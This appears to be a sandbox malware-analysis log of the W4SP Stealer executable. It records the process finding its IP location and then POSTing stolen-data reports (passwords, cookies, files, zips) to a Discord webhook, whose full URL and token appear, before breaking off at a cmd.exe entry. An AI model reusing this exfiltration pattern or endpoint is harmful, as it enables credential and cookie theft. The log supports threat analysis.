2023-09-08 05:31:28 UTC	IN	Data Raw: 62 32 0d 0a 63 61 6c 6c 62 61 63 6b 28 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 69 74 79 22 3a 22 43 68 69 63 61 67 6f 22 2c 22 70 6f 73 74 61 6c 22 3a 22 36 30 36 30 32 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 34 31 2e 38 34 38 33 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 38 37 2e 36 35 31 37 2c 22 49 50 76 34 22 3a 22 31 39 31 2e 31 30 31 2e 36 31 2e 31 39 22 2c 22 73 74 61 74 65 22 3a 22 49 6c 6c 69 6e 6f 69 73 22 7d 29 0d 0a 30 0d 0a 0d 0a Data Ascii: b2callback({"country_code":"US","country_name":"United States","city":"Chicago","postal":"60602","latitude":41.8483,"longitude":-87.6517,"IPv4":"191.101.61.19","state":"Illinois"})0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.7	49738	159.89.102.253	443	C:\Users\user\Desktop\KzqQe0QtRd.exe

Timestamp	kBytes transferred	Direction	Data
2023-09-08 05:31:46 UTC	9	OUT	GET /jsonp/191.101.61.19 HTTP/1.1 Accept-Encoding: identity Host: geolocation-db.com User-Agent: Python-urllib/3.11 Connection: close
2023-09-08 05:31:46 UTC	9	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Fri, 08 Sep 2023 05:31:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: *
2023-09-08 05:31:46 UTC	10	IN	Data Raw: 62 32 0d 0a 63 61 6c 6c 62 61 63 6b 28 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 69 74 79 22 3a 22 43 68 69 63 61 67 6f 22 2c 22 70 6f 73 74 61 6c 22 3a 22 36 30 36 30 32 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 34 31 2e 38 34 38 33 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 38 37 2e 36 35 31 37 2c 22 49 50 76 34 22 3a 22 31 39 31 2e 31 30 31 2e 36 31 2e 31 39 22 2c 22 73 74 61 74 65 22 3a 22 49 6c 6c 69 6e 6f 69 73 22 7d 29 0d 0a 30 0d 0a 0d 0a Data Ascii: b2callback({"country_code":"US","country_name":"United States","city":"Chicago","postal":"60602","latitude":41.8483,"longitude":-87.6517,"IPv4":"191.101.61.19","state":"Illinois"})0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.7	49739	162.159.136.232	443	C:\Users\user\Desktop\KzqQe0QtRd.exe

Timestamp	kBytes transferred	Direction	Data
2023-09-08 05:31:47 UTC	10	OUT	POST /api/webhooks/1145292889375641651/LiLYNKzxiXzK4I7mlokWLchk9nrkUSyIf0sFNc2iJ59Y-dUSvo_8s9RlN3C733kDbhnM HTTP/1.1 Accept-Encoding: identity Content-Length: 509 Host: ptb.discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2023-09-08 05:31:47 UTC	10	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 46 52 4f 4e 54 44 45 53 4b 20 7c 20 31 39 31 2e 31 30 31 2e 36 31 2e 31 39 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 63 6f 6c 6f 72 22 3a 20 31 34 34 30 36 34 31 33 2c 20 22 66 69 65 6c 64 73 22 3a 20 5b 7b 22 6e 61 6d 65 22 3a 20 22 49 6e 74 65 72 65 73 74 69 6e 67 20 66 69 6c 65 73 20 66 6f 75 6e 64 20 6f 6e 20 75 73 65 72 20 50 43 3a 22 2c 20 22 76 61 6c 75 65 22 3a 20 22 5c 6e 22 7d 5d 2c 20 22 61 75 74 68 6f 72 22 3a 20 7b 22 6e 61 6d 65 22 3a 20 22 57 34 53 50 20 7c 20 46 69 6c 65 20 53 74 65 61 6c 65 72 22 7d 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 40 57 34 53 50 20 53 54 45 41 4c 45 52 Data Ascii: {"content": ":flag_us: - `user \| 191.101.61.19 (United States)`", "embeds": [{"color": 14406413, "fields": [{"name": "Interesting files found on user PC:", "value": "\n"}], "author": {"name": "W4SP \| File Stealer"}, "footer": {"text": "@W4SP STEALER
2023-09-08 05:31:47 UTC	11	IN	HTTP/1.1 204 No Content Date: Fri, 08 Sep 2023 05:31:47 GMT Content-Type: text/html; charset=utf-8 Connection: close set-cookie: __dcfduid=0143a5564e0911eea6a03a623f62f3b7; Expires=Wed, 06-Sep-2028 05:31:47 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/ strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1694151109 x-ratelimit-reset-after: 1 Via: 1.1 google Alt-Svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dB0yd6BkIh4F8lq2lRMPwoxa9pFUcEJ20LfJeNLAx3cabvpDQyMgD7z75oO0is9RviH64U0xvKg8y7Edne7%2BcAFrN2HI269hg4nV125a2EFTPmi%2BDLCoGL%2BvhvU2s4Eb9Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=0143a5564e0911eea6a03a623f62f3b7bdaac95bc3d553048bc919b05a437ec594e924ef40a7877beb3a07a8aa50c5b4; Expires=Wed, 06-Sep-2028 05:31:47 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/ Set-Cookie: __cfruid=f9730bd2a9a87fa9858ecea225829124730cc485-1694151107; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2023-09-08 05:31:47 UTC	12	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 4d 77 45 62 67 36 61 4d 57 61 68 6f 41 36 33 64 71 48 69 59 5f 57 51 6d 30 30 64 56 68 70 4c 57 4a 73 39 35 35 66 4f 5f 71 4a 67 2d 31 36 39 34 31 35 31 31 30 37 38 33 37 2d 30 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 30 33 34 63 65 61 37 30 65 61 63 30 61 64 31 2d 4c 41 53 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=MwEbg6aMWahoA63dqHiY_WQm00dVhpLWJs955fO_qJg-1694151107837-0-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8034cea70eac0ad1-LAS

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.7	49718	162.159.137.232	443	C:\Users\user\Desktop\KzqQe0QtRd.exe

Timestamp	kBytes transferred	Direction	Data
2023-09-08 05:31:28 UTC	0	OUT	POST /api/webhooks/1145292889375641651/LiLYNKzxiXzK4I7mlokWLchk9nrkUSyIf0sFNc2iJ59Y-dUSvo_8s9RlN3C733kDbhnM HTTP/1.1 Accept-Encoding: identity Content-Length: 443 Host: ptb.discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2023-09-08 05:31:28 UTC	1	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 46 52 4f 4e 54 44 45 53 4b 20 7c 20 31 39 31 2e 31 30 31 2e 36 31 2e 31 39 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 57 34 53 50 20 5a 69 70 73 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5c 6e 5c 6e 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 31 35 37 38 31 34 30 33 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 40 57 34 53 50 20 53 54 45 41 4c 45 52 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 39 36 33 31 31 34 33 34 39 38 37 37 31 36 32 30 30 34 2f Data Ascii: {"content": ":flag_us: - `user \| 191.101.61.19 (United States)`", "embeds": [{"title": "W4SP Zips", "description": "\n\n", "color": 15781403, "footer": {"text": "@W4SP STEALER", "icon_url": "https://cdn.discordapp.com/attachments/963114349877162004/
2023-09-08 05:31:29 UTC	1	IN	HTTP/1.1 204 No Content Date: Fri, 08 Sep 2023 05:31:29 GMT Content-Type: text/html; charset=utf-8 Connection: close set-cookie: __dcfduid=f62cfb184e0811eeb1f36a6f6f0f0f5d; Expires=Wed, 06-Sep-2028 05:31:29 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/ strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1694151090 x-ratelimit-reset-after: 1 Via: 1.1 google Alt-Svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=USlFMiM5wNk5hN0b4sK2dj6g%2F4q0aLIkgrqFMdpjaFh1MQVFtfKqZf369d7H%2Fs9zrn%2Fg8oryg%2FqWMyd7%2FBU8TFiAjgcpTN83RY%2FL%2Fxq1dzHNJsfxX%2FjqtkjRJIvDyXx%2FDQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=f62cfb184e0811eeb1f36a6f6f0f0f5d905f5fd4954785be51c15ed7a549c991ac2abbf7e85bddb6ce3cd4de987e2f2a; Expires=Wed, 06-Sep-2028 05:31:29 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/ Set-Cookie: __cfruid=7aca78dc5a05c90251608f74cd1523c348787fc4-1694151089; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2023-09-08 05:31:29 UTC	2	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 35 56 4d 56 38 6d 49 59 64 5a 67 6b 62 4c 59 58 34 62 5a 31 6c 51 66 69 52 56 6c 48 6d 48 63 46 79 33 38 71 5a 6d 4a 49 58 4a 73 2d 31 36 39 34 31 35 31 30 38 39 32 33 30 2d 30 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 30 33 34 63 65 33 32 36 62 65 64 30 39 65 64 2d 4c 41 53 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=5VMV8mIYdZgkbLYX4bZ1lQfiRVlHmHcFy38qZmJIXJs-1694151089230-0-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8034ce326bed09ed-LAS

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.7	49719	173.231.16.76	443	C:\Users\user\Desktop\KzqQe0QtRd.exe

Timestamp	kBytes transferred	Direction	Data
2023-09-08 05:31:32 UTC	3	OUT	GET / HTTP/1.1 Accept-Encoding: identity Host: api.ipify.org User-Agent: Python-urllib/3.11 Connection: close
2023-09-08 05:31:32 UTC	3	IN	HTTP/1.1 200 OK Server: nginx/1.25.1 Date: Fri, 08 Sep 2023 05:31:32 GMT Content-Type: text/plain Content-Length: 13 Connection: close Vary: Origin
2023-09-08 05:31:32 UTC	3	IN	Data Raw: 31 39 31 2e 31 30 31 2e 36 31 2e 31 39 Data Ascii: 191.101.61.19

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.7	49720	159.89.102.253	443	C:\Users\user\Desktop\KzqQe0QtRd.exe

Timestamp	kBytes transferred	Direction	Data
2023-09-08 05:31:35 UTC	3	OUT	GET /jsonp/191.101.61.19 HTTP/1.1 Accept-Encoding: identity Host: geolocation-db.com User-Agent: Python-urllib/3.11 Connection: close
2023-09-08 05:31:35 UTC	3	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Fri, 08 Sep 2023 05:31:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: *
2023-09-08 05:31:35 UTC	3	IN	Data Raw: 62 32 0d 0a 63 61 6c 6c 62 61 63 6b 28 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 69 74 79 22 3a 22 43 68 69 63 61 67 6f 22 2c 22 70 6f 73 74 61 6c 22 3a 22 36 30 36 30 32 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 34 31 2e 38 34 38 33 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 38 37 2e 36 35 31 37 2c 22 49 50 76 34 22 3a 22 31 39 31 2e 31 30 31 2e 36 31 2e 31 39 22 2c 22 73 74 61 74 65 22 3a 22 49 6c 6c 69 6e 6f 69 73 22 7d 29 0d 0a 30 0d 0a 0d 0a Data Ascii: b2callback({"country_code":"US","country_name":"United States","city":"Chicago","postal":"60602","latitude":41.8483,"longitude":-87.6517,"IPv4":"191.101.61.19","state":"Illinois"})0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.7	49724	162.159.137.232	443	C:\Users\user\Desktop\KzqQe0QtRd.exe

Timestamp	kBytes transferred	Direction	Data
2023-09-08 05:31:36 UTC	3	OUT	POST /api/webhooks/1145292889375641651/LiLYNKzxiXzK4I7mlokWLchk9nrkUSyIf0sFNc2iJ59Y-dUSvo_8s9RlN3C733kDbhnM HTTP/1.1 Accept-Encoding: identity Content-Length: 554 Host: ptb.discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2023-09-08 05:31:36 UTC	4	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 46 52 4f 4e 54 44 45 53 4b 20 7c 20 31 39 31 2e 31 30 31 2e 36 31 2e 31 39 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 57 34 53 50 20 7c 20 50 61 73 73 77 6f 72 64 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 2a 2a 46 6f 75 6e 64 2a 2a 3a 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 5c 75 64 38 33 64 5c 75 64 64 31 31 20 5c 75 32 30 32 32 20 2a 2a 30 2a 2a 20 50 61 73 73 77 6f 72 64 73 20 46 6f 75 6e 64 5c 6e 3a 6c 69 6e 6b 3a 20 5c 75 32 30 32 32 20 5b 77 34 73 70 50 61 73 73 77 6f 72 64 2e 74 78 74 5d 28 46 61 6c 73 65 29 22 2c 20 22 63 6f 6c 6f 72 22 Data Ascii: {"content": ":flag_us: - `user \| 191.101.61.19 (United States)`", "embeds": [{"title": "W4SP \| Password Stealer", "description": "Found:\n\n\nData:\n\ud83d\udd11 \u2022 0 Passwords Found\n:link: \u2022 [w4spPassword.txt](False)", "color"
2023-09-08 05:31:37 UTC	4	IN	HTTP/1.1 204 No Content Date: Fri, 08 Sep 2023 05:31:37 GMT Content-Type: text/html; charset=utf-8 Connection: close set-cookie: __dcfduid=fae735924e0811ee981132ac1ac9451c; Expires=Wed, 06-Sep-2028 05:31:37 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/ strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1694151098 x-ratelimit-reset-after: 1 Via: 1.1 google Alt-Svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eMJ03x9YURPk4RZhVGbRljWOoiF0YuI8fgXOjxHbmILSBK1XsKS%2Bt0MUCty8y7NXmpnnrJq3PeZGYPouqeKusoLhMirGV7LckMopV3ZZGtiX6WaDMupxdT7mSxl12pju7Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=fae735924e0811ee981132ac1ac9451cd3fc292a85a24f9f0b4de018fff42f161ae06508341aabe111705f148b782242; Expires=Wed, 06-Sep-2028 05:31:37 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/ Set-Cookie: __cfruid=fc0a8906f9dae8d64fb802819195d858cc133aae-1694151097; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2023-09-08 05:31:37 UTC	6	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 6e 2e 6c 50 48 4a 64 4c 79 48 7a 68 66 6b 53 58 4f 42 58 39 47 77 51 34 6a 65 79 78 5a 48 4f 2e 56 6c 4a 6b 39 63 36 34 44 67 51 2d 31 36 39 34 31 35 31 30 39 37 31 36 33 2d 30 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 30 33 34 63 65 36 34 36 62 66 66 30 39 66 39 2d 4c 41 53 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=n.lPHJdLyHzhfkSXOBX9GwQ4jeyxZHO.VlJk9c64DgQ-1694151097163-0-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8034ce646bff09f9-LAS

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.7	49726	64.185.227.156	443	C:\Users\user\Desktop\KzqQe0QtRd.exe

Timestamp	kBytes transferred	Direction	Data
2023-09-08 05:31:40 UTC	6	OUT	GET / HTTP/1.1 Accept-Encoding: identity Host: api.ipify.org User-Agent: Python-urllib/3.11 Connection: close
2023-09-08 05:31:40 UTC	6	IN	HTTP/1.1 200 OK Server: nginx/1.25.1 Date: Fri, 08 Sep 2023 05:31:40 GMT Content-Type: text/plain Content-Length: 13 Connection: close Vary: Origin
2023-09-08 05:31:40 UTC	6	IN	Data Raw: 31 39 31 2e 31 30 31 2e 36 31 2e 31 39 Data Ascii: 191.101.61.19

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.7	49728	159.89.102.253	443	C:\Users\user\Desktop\KzqQe0QtRd.exe

Timestamp	kBytes transferred	Direction	Data
2023-09-08 05:31:41 UTC	6	OUT	GET /jsonp/191.101.61.19 HTTP/1.1 Accept-Encoding: identity Host: geolocation-db.com User-Agent: Python-urllib/3.11 Connection: close
2023-09-08 05:31:42 UTC	6	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Fri, 08 Sep 2023 05:31:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: *
2023-09-08 05:31:42 UTC	6	IN	Data Raw: 62 32 0d 0a 63 61 6c 6c 62 61 63 6b 28 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 69 74 79 22 3a 22 43 68 69 63 61 67 6f 22 2c 22 70 6f 73 74 61 6c 22 3a 22 36 30 36 30 32 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 34 31 2e 38 34 38 33 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 38 37 2e 36 35 31 37 2c 22 49 50 76 34 22 3a 22 31 39 31 2e 31 30 31 2e 36 31 2e 31 39 22 2c 22 73 74 61 74 65 22 3a 22 49 6c 6c 69 6e 6f 69 73 22 7d 29 0d 0a 30 0d 0a 0d 0a Data Ascii: b2callback({"country_code":"US","country_name":"United States","city":"Chicago","postal":"60602","latitude":41.8483,"longitude":-87.6517,"IPv4":"191.101.61.19","state":"Illinois"})0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.7	49735	162.159.135.232	443	C:\Users\user\Desktop\KzqQe0QtRd.exe

Timestamp	kBytes transferred	Direction	Data
2023-09-08 05:31:42 UTC	7	OUT	POST /api/webhooks/1145292889375641651/LiLYNKzxiXzK4I7mlokWLchk9nrkUSyIf0sFNc2iJ59Y-dUSvo_8s9RlN3C733kDbhnM HTTP/1.1 Accept-Encoding: identity Content-Length: 546 Host: ptb.discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2023-09-08 05:31:42 UTC	7	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 46 52 4f 4e 54 44 45 53 4b 20 7c 20 31 39 31 2e 31 30 31 2e 36 31 2e 31 39 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 57 34 53 50 20 7c 20 43 6f 6f 6b 69 65 73 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 2a 2a 46 6f 75 6e 64 2a 2a 3a 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3a 63 6f 6f 6b 69 65 3a 20 5c 75 32 30 32 32 20 2a 2a 30 2a 2a 20 43 6f 6f 6b 69 65 73 20 46 6f 75 6e 64 5c 6e 3a 6c 69 6e 6b 3a 20 5c 75 32 30 32 32 20 5b 77 34 73 70 43 6f 6f 6b 69 65 73 2e 74 78 74 5d 28 46 61 6c 73 65 29 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 31 34 34 30 36 34 Data Ascii: {"content": ":flag_us: - `user \| 191.101.61.19 (United States)`", "embeds": [{"title": "W4SP \| Cookies Stealer", "description": "Found:\n\n\nData:\n:cookie: \u2022 0 Cookies Found\n:link: \u2022 [w4spCookies.txt](False)", "color": 144064
2023-09-08 05:31:43 UTC	7	IN	HTTP/1.1 204 No Content Date: Fri, 08 Sep 2023 05:31:43 GMT Content-Type: text/html; charset=utf-8 Connection: close set-cookie: __dcfduid=fe97be504e0811eeb4dd324d2adf1d26; Expires=Wed, 06-Sep-2028 05:31:43 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/ strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1694151104 x-ratelimit-reset-after: 1 Via: 1.1 google Alt-Svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oYG4Wm3O2w%2F25tNrKSRXo%2BD8vqrn%2FkdKqSR6yEEEHJE7ovJX0zA%2FFncokS7cv9vfrMGn0iQQs285PhnEKmT5lfRcagzfYCBEYVPD9UkCt6c3kBtlRzhMFfqM4W7fFVgDAg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=fe97be504e0811eeb4dd324d2adf1d26e216ade3357efeb556f1ce9be2d8dc73c7ce9aa60886b6ce1994b05475e53e9f; Expires=Wed, 06-Sep-2028 05:31:43 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/ Set-Cookie: __cfruid=26dac8e550dfe086f73e761dc61b510d72f5509e-1694151103; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2023-09-08 05:31:43 UTC	9	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 62 63 45 79 63 33 68 7a 43 6d 56 6b 66 66 4d 78 6c 5a 43 6f 5a 34 32 6a 61 32 65 47 78 4b 4c 6a 76 30 69 51 30 63 5a 70 6e 6f 51 2d 31 36 39 34 31 35 31 31 30 33 33 35 31 2d 30 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 30 33 34 63 65 38 62 30 62 65 33 30 39 66 64 2d 4c 41 53 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=bcEyc3hzCmVkffMxlZCoZ42ja2eGxKLjv0iQ0cZpnoQ-1694151103351-0-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8034ce8b0be309fd-LAS

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.7	49737	173.231.16.76	443	C:\Users\user\Desktop\KzqQe0QtRd.exe

Timestamp	kBytes transferred	Direction	Data
2023-09-08 05:31:44 UTC	9	OUT	GET / HTTP/1.1 Accept-Encoding: identity Host: api.ipify.org User-Agent: Python-urllib/3.11 Connection: close
2023-09-08 05:31:45 UTC	9	IN	HTTP/1.1 200 OK Server: nginx/1.25.1 Date: Fri, 08 Sep 2023 05:31:44 GMT Content-Type: text/plain Content-Length: 13 Connection: close Vary: Origin
2023-09-08 05:31:45 UTC	9	IN	Data Raw: 31 39 31 2e 31 30 31 2e 36 31 2e 31 39 Data Ascii: 191.101.61.19

Target ID:	0
Start time:	07:31:15
Start date:	08/09/2023
Path:	C:\Users\user\Desktop\KzqQe0QtRd.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\KzqQe0QtRd.exe
Imagebase:	0x7ff701260000
File size:	14'042'365 bytes
MD5 hash:	7FE90DCF5C49FD85CE12939B8CC3315C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Target ID:	1
Start time:	07:31:19
Start date:	08/09/2023
Path:	C:\Users\user\Desktop\KzqQe0QtRd.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\KzqQe0QtRd.exe
Imagebase:	0x7ff701260000
File size:	14'042'365 bytes
MD5 hash:	7FE90DCF5C49FD85CE12939B8CC3315C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Target ID:	2
Start time:	07:31:22
Start date:	08/09/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
